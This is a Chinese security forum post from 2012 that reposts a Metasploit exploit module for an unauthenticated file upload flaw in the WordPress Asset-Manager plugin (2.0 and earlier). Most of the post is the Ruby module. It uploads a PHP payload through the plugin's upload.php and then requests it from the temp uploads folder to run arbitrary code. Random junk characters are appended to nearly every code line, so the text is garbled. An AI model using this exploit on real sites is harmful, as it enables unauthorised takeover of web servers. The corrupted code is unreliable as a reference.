找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2130|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
: X' }1 G3 y3 M$ j% S" P) K/ O; O4 A: }. ?5 h
##
0 L$ ], d( T8 a1 X+ [8 j# This file is part of the Metasploit Framework and may be subject to' F  A) `3 I5 a( B8 ^
# redistribution and commercial restrictions. Please see the Metasploit
8 ~( V7 v7 g: w+ {# Framework web site for more information on licensing and terms of use.0 L* w/ c7 n7 _
#   http://metasploit.com/framework/* ]! W( \$ y! G; \) Q1 K: o# F
##7 _0 g4 A2 R: w. O% e, D  B6 ~/ T% Q

9 S: I6 z( a/ H, t# s# Prequire 'msf/core'
* i$ Y) E- Q7 V! {9 ?require 'msf/core/exploit/php_exe'
6 ]1 W' A3 C' p# G) ~1 \. q4 ?
- O% d2 V% g; K: ]6 pclass Metasploit3 < Msf::Exploit::Remote
2 s' K/ \, W% G5 ]3 i% N3 v8 i  Rank = ExcellentRanking* a* ]0 X, Y& J

" q2 q, _5 W* n3 m) i; q  include Msf::Exploit::Remote::HttpClient1 s) c8 E9 R: y; X% k
  include Msf::Exploit:hpEXE8 F2 a$ j6 N9 k# ^, b

: o! D- ?. u: p: j$ {  def initialize(info = {})! k5 C' ]0 \: y( P$ H  h
    super(update_info(info,
8 p" R1 t$ u8 ]5 f7 w  ~7 ?      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',: p! m# m# w# Y2 G& k; ]6 e& J
      'Description'    => %q{
! j7 {9 s; g. J1 B3 I" ]4 x        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress* d6 D; H+ `0 b
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a& r/ w+ s' u6 L8 y( u" c8 H6 M2 C
        temp directory without authentication, which results in arbitrary code execution.3 m$ N* z# b. j
      },5 V9 ^% d, b& D
      'Author'         =>7 E0 j+ N9 D  B# ]
        [: S) x" b1 X# W+ _
          'Sammy FORGIT', # initial discovery
% z& I7 j9 |8 u6 C9 l' ^' p5 o          'James Fitts <fitts.james[at]gmail.com>' # metasploit module/ k5 [1 l' Z& Z+ }4 @% C# _
        ],
8 K' v) v  a6 W% R$ `      'License'        => MSF_LICENSE,
$ o5 ?7 h! a: Z$ ?      'References'     =>
; f2 A. b2 O8 {; x, F        [
* T& k5 e( u, s+ H          [ 'OSVDB', '82653' ],
0 o, W, d7 G, X5 a$ i. ^9 s          [ 'BID', '53809' ],5 T( ]% N# h/ n8 \5 s& x
          [ 'EDB', '18993' ],' T  X6 m4 F3 H: J2 U! S; y& a/ r1 h
          [ 'URL', 'http:// www.myhack58.com /' ]
' T9 [; `3 _8 `% h0 b+ _        ],
6 y% _2 T* Y2 A) k      'Payload'       =>0 g0 I/ n: y( m- E, @
        {
2 C% f2 P, B: I& k          'BadChars' => "\x00",5 Y+ M* w2 S; N  b0 s& D. B
        },
* U+ A- y8 `) k/ b      'Platform'       => 'php',6 V( S$ B8 n" f1 l( x
      'Arch'           => ARCH_PHP,
# a+ g. q6 m$ t      'Targets'        =>
& A( n* E3 l! v, X# Q        [
2 O' B9 C; d) W          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],5 Y' V, M0 f% c' \9 ?
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
6 v1 L5 T' F, r6 Y7 o. r& s1 o        ],2 K+ Z! r3 p5 x( Q
      'DefaultTarget' => 0,9 d' u; h$ y& J2 x+ d* q/ E; n6 z
      'DisclosureDate' => 'May 26 2012'))
$ X( l# g2 v7 h# w; W1 B8 J
7 w5 y) t9 u4 W, s  p* [0 ~    register_options(
0 p% ?& h2 d9 ~6 `9 ], Z      [
9 `3 o/ x& t3 L( U        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
( N+ t) p, x' c% n' ]2 b+ |      ], self.class)5 f# n( d: H: K: X) [
  end) j* l# }8 _& W

% V5 E1 g6 J, i# F0 M3 y  x  def exploit
  [& x. v" l9 Z* b    uri =  target_uri.path
) Q; v3 ]' s0 }  b! x2 H    uri << '/' if uri[-1,1] != '/'5 c& ]+ F8 _4 z# _7 o
    peer = "#{rhost}:#{rport}": A! h3 A6 a% X2 s2 {4 |
    payload_name = "#{rand_text_alpha(5)}.php"; c& X& y* Z0 _- m( Y
    php_payload = get_write_exec_payload(:unlink_self=>true)% O" X& S7 a1 {6 J5 {3 @

" t: I, W+ M4 J3 r9 K. u, _) r# ^    data = Rex::MIME::Message.new( ~  f2 @& B6 A1 v
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
/ S4 Y! T# |$ g7 i# G    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')1 z# |. C% i; c/ ^

! r5 }, a" K6 L, ?8 R' R* ], n3 ]    print_status("#{peer} - Uploading payload #{payload_name}")
8 m; d4 @* \' a$ w0 M# g    res = send_request_cgi({; N& h& V- J# T; C1 v. T6 K
      'method'  => 'POST',# m% V. d3 c. D( G1 Z% `
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",: J/ i1 \% a) o; n+ U8 H2 j' e
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
4 Y5 c( B; u' N5 j2 {) K      'data'    => post_data
3 E0 n" y, R- F& q5 [3 x; V. Z4 s    })
$ X7 j. d! e* t5 U
7 _% u, G% B" `. F7 H7 e    if not res or res.code != 200 or res.body !~ /#{payload_name}/
- J! g4 Y1 d- ]5 Z  |" W% A  c      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
5 K9 n. M6 B/ g1 S, Tend
0 {4 X6 f3 a% h' v" ? 5 _  n/ [0 r: c$ A5 V$ I/ O
    print_status("#{peer} - Executing payload #{payload_name}"). F: ^, f- x* I% u) k, h9 n' m
    res = send_request_raw({
; ^4 A  p0 X# K, _' b/ B* \      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
: a3 t6 c8 S7 N) v% V9 C( Z, f: P      'method'  => 'GET'
+ p7 g( f1 G/ |/ a- v  K$ k    })  e5 l6 d; }& K& p. X

" `. |5 L  T/ O; j* G    if res and res.code != 200
7 ?& ^+ K* M! C4 F5 O* I8 d      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")( g* p" F) @; z5 g! C! ^- |3 v' G
    end" ]: h: O+ X4 t2 v5 M
  end( {+ M3 Z' t' w
end
% V' D0 K% M& M) k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表